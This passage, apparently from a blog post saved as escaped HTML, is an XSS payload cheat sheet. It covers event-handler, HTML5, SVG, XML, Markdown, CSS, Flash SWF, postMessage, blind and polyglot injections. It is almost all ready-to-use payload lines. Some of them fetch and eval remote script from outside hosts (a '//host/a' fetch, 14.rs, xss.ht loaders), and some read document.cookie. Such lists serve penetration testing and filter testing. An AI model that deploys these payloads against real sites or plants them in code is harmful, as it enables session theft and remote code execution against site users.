onpointerdown=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerenter=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerleave=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointermove=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerout=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003cbr\u003e\u0026lt;div onpointerup=\"alert(45)\"\u0026gt;MOVE HERE\u0026lt;\/div\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"baf3\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS using HTML5 tags\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"fff6\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;body onload=alert(\/XSS\/.source)\u0026gt;\u003cbr\u003e\u0026lt;input autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;select autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;textarea autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;keygen autofocus onfocus=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;video\/poster\/onerror=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;video\u0026gt;\u0026lt;source onerror=\"javascript:alert(1)\"\u0026gt;\u003cbr\u003e\u0026lt;video src=_ onloadstart=\"alert(1)\"\u0026gt;\u003cbr\u003e\u0026lt;details\/open\/ontoggle=\"alert`1`\"\u0026gt;\u003cbr\u003e\u0026lt;audio src onloadstart=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;marquee onstart=alert(1)\u0026gt;\u003cbr\u003e\u0026lt;meter value=2 min=0 max=10 onmouseover=alert(1)\u0026gt;2 out of 10\u0026lt;\/meter\u0026gt;\u003c\/span\u003e\u003cspan id=\"ed4e\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;body ontouchstart=alert(1)\u0026gt; \/\/ Triggers when a finger touch the screen\u003cbr\u003e\u0026lt;body ontouchend=alert(1)\u0026gt;   \/\/ Triggers when a finger is removed from touch screen\u003cbr\u003e\u0026lt;body ontouchmove=alert(1)\u0026gt;  \/\/ When a finger is dragged across the screen.\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"3538\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS using a remote JS\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"7e03\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;svg\/onload='fetch(\"\/\/host\/a\").then(r=\u0026gt;r.text().then(t=\u0026gt;eval(t)))'\u0026gt;\u003cbr\u003e\u0026lt;script src=14.rs\u0026gt;\u003cbr\u003e\/\/ you can also specify an arbitrary payload with 14.rs\/#payload\u003cbr\u003ee.g: 14.rs\/#alert(document.domain)\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"f981\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in hidden input\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"6e21\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;input type=\"hidden\" accesskey=\"X\" onclick=\"alert(1)\"\u0026gt;\u003cbr\u003eUse CTRL+SHIFT+X to trigger the onclick event\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"d820\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eDOM based XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"3e61\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eBased on a DOM XSS sink.\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"2902\" class=\"oq mh gu om b ij or os l ot ou\"\u003e#\"\u0026gt;\u0026lt;img src=\/ onerror=alert(2)\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"78f7\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in JS Context\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"92d8\" class=\"oq mh gu om b ij or os l ot ou\"\u003e-(confirm)(document.domain)\/\/\u003cbr\u003e; alert(1);\/\/\u003cbr\u003e\/\/ (payload without quote\/double quote from [@brutelogic](https:\/\/twitter.com\/brutelogic)\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"a68d\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eXSS in files\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"95b8\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"6d5f\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;name\u0026gt;\u003cbr\u003e  \u0026lt;value\u0026gt;\u0026lt;![CDATA[\u0026lt;script\u0026gt;confirm(document.domain)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/value\u0026gt;\u003cbr\u003e\u0026lt;\/name\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"e70d\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in XML\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"7bd0\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;html\u0026gt;\u003cbr\u003e\u0026lt;head\u0026gt;\u0026lt;\/head\u0026gt;\u003cbr\u003e\u0026lt;body\u0026gt;\u003cbr\u003e\u0026lt;something:script xmlns:something=\"http:\/\/www.w3.org\/1999\/xhtml\"\u0026gt;alert(1)\u0026lt;\/something:script\u0026gt;\u003cbr\u003e\u0026lt;\/body\u0026gt;\u003cbr\u003e\u0026lt;\/html\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"c55a\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SVG\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"597a\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;?xml version=\"1.0\" standalone=\"no\"?\u0026gt;\u003cbr\u003e\u0026lt;!DOCTYPE svg PUBLIC \"-\/\/W3C\/\/DTD SVG 1.1\/\/EN\" \"http:\/\/www.w3.org\/Graphics\/SVG\/1.1\/DTD\/svg11.dtd\"\u0026gt;\u003c\/span\u003e\u003cspan id=\"d557\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;svg version=\"1.1\" baseProfile=\"full\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"\u0026gt;\u003cbr\u003e  \u0026lt;polygon id=\"triangle\" points=\"0,0 0,50 50,0\" fill=\"#009900\" stroke=\"#004400\"\/\u0026gt;\u003cbr\u003e  \u0026lt;script type=\"text\/javascript\"\u0026gt;\u003cbr\u003e    alert(document.domain);\u003cbr\u003e  \u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;\/svg\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"1575\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SVG (short)\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"bc98\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" onload=\"alert(document.domain)\"\/\u0026gt;\u003c\/span\u003e\u003cspan id=\"90b2\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;svg\u0026gt;\u0026lt;desc\u0026gt;\u0026lt;![CDATA[\u0026lt;\/desc\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/svg\u0026gt;\u003cbr\u003e\u0026lt;svg\u0026gt;\u0026lt;foreignObject\u0026gt;\u0026lt;![CDATA[\u0026lt;\/foreignObject\u0026gt;\u0026lt;script\u0026gt;alert(2)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/svg\u0026gt;\u003cbr\u003e\u0026lt;svg\u0026gt;\u0026lt;title\u0026gt;\u0026lt;![CDATA[\u0026lt;\/title\u0026gt;\u0026lt;script\u0026gt;alert(3)\u0026lt;\/script\u0026gt;]]\u0026gt;\u0026lt;\/svg\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"bc4e\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in Markdown\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"33d2\" class=\"oq mh gu om b ij or os l ot ou\"\u003e[a](javascript:prompt(document.cookie))\u003cbr\u003e[a](j a v a s c r i p t:prompt(document.cookie))\u003cbr\u003e[a](data:text\/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\u003cbr\u003e[a](javascript:window.onerror=alert;throw%201)\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"8ba2\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SWF flash application\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"1187\" class=\"oq mh gu om b ij or os l ot ou\"\u003eBrowsers other than IE: \u003ca class=\"af ow\" href=\"http:\/\/0me.me\/demo\/xss\/xssproject.swf?js=alert%28document.domain%29%3B\" rel=\"noopener ugc nofollow\" target=\"_blank\"\u003ehttp:\/\/0me.me\/demo\/xss\/xssproject.swf?js=alert(document.domain);\u003c\/a\u003e\u003cbr\u003eIE8: \u003ca class=\"af ow\" href=\"http:\/\/0me.me\/demo\/xss\/xssproject.swf?js=try%7Balert%28document.domain%29%7Dcatch%28e%29%7B\" rel=\"noopener ugc nofollow\" target=\"_blank\"\u003ehttp:\/\/0me.me\/demo\/xss\/xssproject.swf?js=try{alert(document.domain)}catch(e){\u003c\/a\u003e window.open(‘?js=history.go(-1)’,’_self’);}\u003cbr\u003eIE9: http:\/\/0me.me\/demo\/xss\/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"f9a2\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in SWF flash application\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"2596\" class=\"oq mh gu om b ij or os l ot ou\"\u003eflashmediaelement.swf?jsinitfunctio%gn=alert`1`\u003cbr\u003eflashmediaelement.swf?jsinitfunctio%25gn=alert(1)\u003cbr\u003eZeroClipboard.swf?id=\\\"))} catch(e) {alert(1);}\/\/\u0026amp;width=1000\u0026amp;height=1000\u003cbr\u003eswfupload.swf?movieName=\"]);}catch(e){}if(!self.a)self.a=!alert(1);\/\/\u003cbr\u003eswfupload.swf?buttonText=test\u0026lt;a href=\"javascript:confirm(1)\"\u0026gt;\u0026lt;img src=\"https:\/\/web.archive.org\/web\/20130730223443im_\/http:\/\/appsec.ws\/ExploitDB\/cMon.jpg\"\/\u0026gt;\u0026lt;\/a\u0026gt;\u0026amp;.swf\u003cbr\u003eplupload.flash.swf?%#target%g=alert\u0026amp;uid%g=XSS\u0026amp;\u003cbr\u003emoxieplayer.swf?url=https:\/\/github.com\/phwd\/poc\/blob\/master\/vid.flv?raw=true\u003cbr\u003evideo-js.swf?readyFunction=alert(1)\u003cbr\u003eplayer.swf?playerready=alert(document.cookie)\u003cbr\u003eplayer.swf?tracecall=alert(document.cookie)\u003cbr\u003ebanner.swf?clickTAG=javascript:alert(1);\/\/\u003cbr\u003eio.swf?yid=\\\"));}catch(e){alert(1);}\/\/\u003cbr\u003evideo-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29\u003cbr\u003ebookContent.swf?currentHTMLURL=data:text\/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4\u003cbr\u003eflashcanvas.swf?id=test\\\"));}catch(e){alert(document.domain)}\/\/\u003cbr\u003ephpmyadmin\/js\/canvg\/flashcanvas.swf?id=test\\”));}catch(e){alert(document.domain)}\/\/\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"af79\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS in CSS\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"8678\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;!DOCTYPE html\u0026gt;\u003cbr\u003e\u0026lt;html\u0026gt;\u003cbr\u003e\u0026lt;head\u0026gt;\u003cbr\u003e\u0026lt;style\u0026gt;\u003cbr\u003ediv  {\u003cbr\u003e    background-image: url(\"data:image\/jpg;base64,\u0026lt;\\\/style\u0026gt;\u0026lt;svg\/onload=alert(document.domain)\u0026gt;\");\u003cbr\u003e    background-color: #cccccc;\u003cbr\u003e}\u003cbr\u003e\u0026lt;\/style\u0026gt;\u003cbr\u003e\u0026lt;\/head\u0026gt;\u003cbr\u003e  \u0026lt;body\u0026gt;\u003cbr\u003e    \u0026lt;div\u0026gt;lol\u0026lt;\/div\u0026gt;\u003cbr\u003e  \u0026lt;\/body\u0026gt;\u003cbr\u003e\u0026lt;\/html\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"284c\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eXSS in PostMessage\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"9b32\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cem class=\"gu\"\u003eIf the target origin is asterisk * the message can be sent to any domain has reference to the child page.\u003c\/em\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"2a58\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\u0026lt;html\u0026gt;\u003cbr\u003e\u0026lt;body\u0026gt;\u003cbr\u003e    \u0026lt;input type=button value=\"Click Me\" id=\"btn\"\u0026gt;\u003cbr\u003e\u0026lt;\/body\u0026gt;\u003c\/span\u003e\u003cspan id=\"aba8\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;script\u0026gt;\u003cbr\u003edocument.getElementById('btn').onclick = function(e){\u003cbr\u003e    window.poc = window.open('http:\/\/www.redacted.com\/#login');\u003cbr\u003e    setTimeout(function(){\u003cbr\u003e        window.poc.postMessage(\u003cbr\u003e            {\u003cbr\u003e                \"sender\": \"accounts\",\u003cbr\u003e                \"url\": \"javascript:confirm('XSS')\",\u003cbr\u003e            },\u003cbr\u003e            '*'\u003cbr\u003e        );\u003cbr\u003e    }, 2000);\u003cbr\u003e}\u003cbr\u003e\u0026lt;\/script\u0026gt;\u003cbr\u003e\u0026lt;\/html\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"c0d0\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003eBlind XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\n\u003cp id=\"dea0\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003eXSS Hunter\u003c\/strong\u003e\u003c\/p\u003e\n\u003cp id=\"474b\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003eXSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.\u003c\/p\u003e\n\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"0d2c\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\"\u0026gt;\u0026lt;script src=\/\/yoursubdomain.xss.ht\u0026gt;\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003cspan id=\"03b6\" class=\"oq mh gu om b ij ov os l ot ou\"\u003ejavascript:eval('var a=document.createElement(\\'script\\');a.src=\\'https:\/\/yoursubdomain.xss.ht\\';document.body.appendChild(a)')\u003c\/span\u003e\u003cspan id=\"7ecb\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;script\u0026gt;function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(\"load\", b);a.open(\"GET\", \"\/\/yoursubdomain.xss.ht\");a.send();\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003cspan id=\"e819\" class=\"oq mh gu om b ij ov os l ot ou\"\u003e\u0026lt;script\u0026gt;$.getScript(\"\/\/yoursubdomain.xss.ht\")\u0026lt;\/script\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003ch1 id=\"df9f\" class=\"mg mh gu bf mi mj mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nb nc nd bk\"\u003ePolyglot XSS\u003c\/h1\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"17cb\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — 0xsobky\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"af81\" class=\"oq mh gu om b ij or os l ot ou\"\u003ejaVasCript:\/*-\/*`\/*\\`\/*'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/\u0026lt;\/stYle\/\u0026lt;\/titLe\/\u0026lt;\/teXtarEa\/\u0026lt;\/scRipt\/--!\u0026gt;\\x3csVg\/\u0026lt;sVg\/oNloAd=alert()\/\/\u0026gt;\\x3e\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"719c\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Ashar Javed\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"8a6d\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\"\u0026gt;\u0026gt;\u0026lt;marquee\u0026gt;\u0026lt;img src=x onerror=confirm(1)\u0026gt;\u0026lt;\/marquee\u0026gt;\" \u0026gt;\u0026lt;\/plaintext\\\u0026gt;\u0026lt;\/|\\\u0026gt;\u0026lt;plaintext\/onmouseover=prompt(1) \u0026gt;\u0026lt;script\u0026gt;prompt(1)\u0026lt;\/script\u0026gt;@gmail.com\u0026lt;isindex formaction=javascript:alert(\/XSS\/) type=submit\u0026gt;'--\u0026gt;\" \u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;\/script\u0026gt;\"\u0026gt;\u0026lt;img\/id=\"confirm\u0026amp;lpar; 1)\"\/alt=\"\/\"src=\"\/\"onerror=eval(id\u0026amp;%23x29;\u0026gt;'\"\u0026gt;\u0026lt;img src=\"http: \/\/i.imgur.com\/P8mL8.jpg\"\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"ddac\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Mathias Karlsson\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"4fa1\" class=\"oq mh gu om b ij or os l ot ou\"\u003e\" onclick=alert(1)\/\/\u0026lt;button ‘ onclick=alert(1)\/\/\u0026gt; *\/ alert(1)\/\/\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"644e\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Rsnake\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"db6d\" class=\"oq mh gu om b ij or os l ot ou\"\u003e';alert(String.fromCharCode(88,83,83))\/\/';alert(String. fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode (88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/-- \u0026gt;\u0026lt;\/SCRIPT\u0026gt;\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String.fromCharCode(88,83,83)) \u0026lt;\/SCRIPT\u0026gt;\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"7bad\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — Daniel Miessler\u003c\/strong\u003e\u003c\/p\u003e\u003c\/blockquote\u003e\n\u003cpre class=\"og oh oi oj ok ol om on oo ay op bk\"\u003e\u003cspan id=\"afc0\" class=\"oq mh gu om b ij or os l ot ou\"\u003e';alert(String.fromCharCode(88,83,83))\/\/';alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/\";alert(String.fromCharCode(88,83,83))\/\/--\u0026gt;\u0026lt;\/SCRIPT\u0026gt;\"\u0026gt;'\u0026gt;\u0026lt;SCRIPT\u0026gt;alert(String.fromCharCode(88,83,83))\u0026lt;\/SCRIPT\u0026gt;\u003cbr\u003e“ onclick=alert(1)\/\/\u0026lt;button ‘ onclick=alert(1)\/\/\u0026gt; *\/ alert(1)\/\/\u003cbr\u003e'\"\u0026gt;\u0026gt;\u0026lt;marquee\u0026gt;\u0026lt;img src=x onerror=confirm(1)\u0026gt;\u0026lt;\/marquee\u0026gt;\"\u0026gt;\u0026lt;\/plaintext\\\u0026gt;\u0026lt;\/|\\\u0026gt;\u0026lt;plaintext\/onmouseover=prompt(1)\u0026gt;\u0026lt;script\u0026gt;prompt(1)\u0026lt;\/script\u0026gt;@gmail.com\u0026lt;isindex formaction=javascript:alert(\/XSS\/) type=submit\u0026gt;'--\u0026gt;\"\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;script\u0026gt;alert(1)\u0026lt;\/script\u0026gt;\"\u0026gt;\u0026lt;img\/id=\"confirm\u0026amp;lpar;1)\"\/alt=\"\/\"src=\"\/\"onerror=eval(id\u0026amp;%23x29;\u0026gt;'\"\u0026gt;\u0026lt;img src=\"http:\/\/i.imgur.com\/P8mL8.jpg\"\u0026gt;\u003cbr\u003ejavascript:\/\/'\/\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/script\u0026gt;--\u0026gt;\u0026lt;p\" onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\"\/\u0026lt;\/textarea\u0026gt;*\/\u0026lt;alert()\/*' onclick=alert()\/\/\u0026gt;a\u003cbr\u003ejavascript:\/\/\u0026lt;\/title\u0026gt;\"\/\u0026lt;\/script\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\/--\u0026gt;*\/\u0026lt;alert()\/*' onclick=alert()\/\/\u0026gt;\/\u003cbr\u003ejavascript:\/\/\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;a\"\/\/' onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/'\/\/\" --\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;b onclick= alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/\u0026lt;\/title\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/script --\u0026gt;\u0026lt;li '\/\/\" '*\/alert()\/*', onclick=alert()\/\/\u003cbr\u003ejavascript:alert()\/\/--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;a\"\/\/' onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003e--\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\"\/\u0026lt;\/textarea\u0026gt;\u0026lt;a' onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003e\/\u0026lt;\/title\/'\/\u0026lt;\/style\/\u0026lt;\/script\/\u0026lt;\/textarea\/--\u0026gt;\u0026lt;p\" onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003cbr\u003ejavascript:\/\/--\u0026gt;\u0026lt;\/title\u0026gt;\u0026lt;\/style\u0026gt;\u0026lt;\/textarea\u0026gt;\u0026lt;\/script\u0026gt;\u0026lt;svg \"\/\/' onclick=alert()\/\/\u003cbr\u003e\/\u0026lt;\/title\/'\/\u0026lt;\/style\/\u0026lt;\/script\/--\u0026gt;\u0026lt;p\" onclick=alert()\/\/\u0026gt;*\/alert()\/*\u003c\/span\u003e\u003c\/pre\u003e\n\u003cblockquote class=\"ne nf ng\"\u003e\u003cp id=\"54c4\" class=\"nh ni nj nk b nl nm nn no np nq nr ns nt nu nv nw nx ny nz oa ob oc od oe of gn bk\"\u003e\u003cstrong class=\"nk gv\"\u003ePolyglot XSS — from 